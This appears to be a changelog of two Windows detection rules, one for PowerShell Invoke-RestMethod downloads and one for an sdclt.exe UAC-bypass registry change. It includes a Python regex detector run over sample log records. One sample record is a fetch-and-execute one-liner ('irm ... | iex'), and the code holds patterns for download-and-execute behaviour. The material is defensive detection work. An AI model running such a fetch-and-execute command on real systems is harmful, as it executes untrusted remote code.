CREATED: WIN-POWERSHELL-INVOKE-RESTMETHOD (#1452)
This detector identifies the execution of PowerShell scripts that include the Invoke-RestMethod cmdlet. The Invoke-RestMethod cmdlet was designed to send HTTP and HTTPS requests to Representational State Transfer (REST) web services that return richly structured data, but it can be used to download any type of content.
ATT&CK Technique T1086
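As an added illustration of what this kind of detector does (this is example code written for this note, not the detector's own logic), the following Python runs a case-insensitive match for the Invoke-RestMethod cmdlet over a handful of constructed PowerShell script-block records shaped like Event ID 4104 entries. Beyond what the entry above states, it also matches the cmdlet's built-in alias `irm` and flags two triage-relevant details, whether the call writes to disk with `-OutFile` and whether its output is piped into Invoke-Expression; the sample records, host names and URLs are made up.

```python
import re

# Constructed sample records in the shape of PowerShell script block logging
# (Event ID 4104) entries: one dict per logged script block. These are
# made-up records for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"record_id": 1, "host": "ws01",
     "script_block": "Get-Process | Sort-Object CPU -Descending"},
    {"record_id": 2, "host": "ws01",
     "script_block": "$r = Invoke-RestMethod -Uri 'https://example.invalid/api/status'"},
    {"record_id": 3, "host": "ws02",
     "script_block": "invoke-restmethod -Method Get -Uri $u -OutFile $f"},
    {"record_id": 4, "host": "ws02",
     "script_block": "irm 'https://example.invalid/data.txt' | iex"},
    {"record_id": 5, "host": "ws03",
     "script_block": "Write-Host 'Invoke-RestMethodology is not a cmdlet'"},
]

# Match the cmdlet name or its built-in alias `irm`, case-insensitively, as
# PowerShell itself is case-insensitive. The lookarounds act as word
# boundaries that also treat '-' as part of the token, so a longer
# identifier that merely contains the name does not match.
INVOKE_RESTMETHOD_RE = re.compile(
    r"(?<![\w-])(Invoke-RestMethod|irm)(?![\w-])", re.IGNORECASE)

# Context used for triage, not for the verdict itself.
OUTFILE_RE = re.compile(r"-OutFile(?![\w-])", re.IGNORECASE)
PIPE_TO_IEX_RE = re.compile(r"\|\s*(iex|Invoke-Expression)(?![\w-])", re.IGNORECASE)


def detect_invoke_restmethod(events):
    """Return one alert dict per event whose script block invokes
    Invoke-RestMethod (or its alias). Non-matching events produce nothing."""
    alerts = []
    for ev in events:
        block = ev["script_block"]
        m = INVOKE_RESTMETHOD_RE.search(block)
        if not m:
            continue
        alerts.append({
            "detector": "WIN-POWERSHELL-INVOKE-RESTMETHOD",
            "technique": "T1086",
            "record_id": ev["record_id"],
            "host": ev["host"],
            "matched": m.group(1),
            # True when the response is written to a file rather than kept
            # in memory: a download to disk.
            "writes_to_disk": OUTFILE_RE.search(block) is not None,
            # True when the response is executed directly as script text.
            "piped_to_expression": PIPE_TO_IEX_RE.search(block) is not None,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_invoke_restmethod(SAMPLE_EVENTS):
        print(alert)
```

Running the block prints three alerts (records 2, 3 and 4); record 5 is not flagged because the cmdlet name only appears as a prefix of a longer word. In a real pipeline the `script_block` field would come from the `ScriptBlockText` of 4104 events, and the two context flags would typically drive severity rather than the match itself.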
CREATED: WIN-SDCLT-UAC-BYPASS-REGMOD (#1490)
This detector identifies Windows Registry modifications that enable the use of Windows Backup Client (sdclt.exe) as a UAC bypass/privilege exploit technique.
ATT&CK Technique T1088